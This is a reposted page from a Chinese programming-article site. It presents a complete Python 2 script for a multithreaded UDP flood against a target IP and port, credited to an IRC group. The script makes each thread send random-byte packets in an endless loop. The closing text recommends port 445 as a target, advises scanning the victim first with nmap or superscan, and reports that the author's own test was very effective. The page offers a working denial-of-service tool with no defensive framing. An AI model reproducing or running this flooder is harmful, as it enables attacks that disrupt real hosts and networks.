欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

一个python版本多线程udp flooding的小程序

程序员文章站 2022-04-22 10:49:05
#!/usr/bin/python import socket import threading import random impor...
#!/usr/bin/python


import socket


import threading


import random


import sys





###########################################


#


# Author: sniker


# Contact: irc.eth0.info


#


# eth0 will prevail. || irc.eth0.info


#


############################################





class attack(threading.Thread):


    def __init__ (self, ip, port, psize):


        threading.Thread.__init__(self)


        self.ip = ip


        self.port = port


        self.psize = psize





    def run(self):


        print "Thread initiated, flooding " + self.ip + ":" + str(self.port) + "."


        sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)


        bytes = random._urandom(self.psize)


        while True:


            sock.sendto(bytes,(self.ip, self.port))








if len(sys.argv) < 2:


    print "Usage: "+ sys.argv[0] +" IP PORT(optional, default random) PACKETSIZE(optional 0-65500 default 1024) THREADS(optional default 10)"


    sys.exit()





try:


    threads = sys.argv[4]


except NameError:


    threads = 10


except IndexError:


    threads = 10





try:


    if int(sys.argv[3]) > 0 and int(sys.argv[3]) <= 65500:


        psize = int(sys.argv[3])


        print psize


    else:


        psize = 1024


except IndexError:


    psize = 1024








for host in range(int(threads)):


    try:


        port = sys.argv[2]


    except IndexError:


        port = random.randrange(1, 65535, 2)


    at = attack(sys.argv[1], int(port), int(psize))


    at.start()



比较常用的udp端口如445端口,也可以提前用nmap或者superscan扫一下目标主机

我自己测试效果还是很显著的。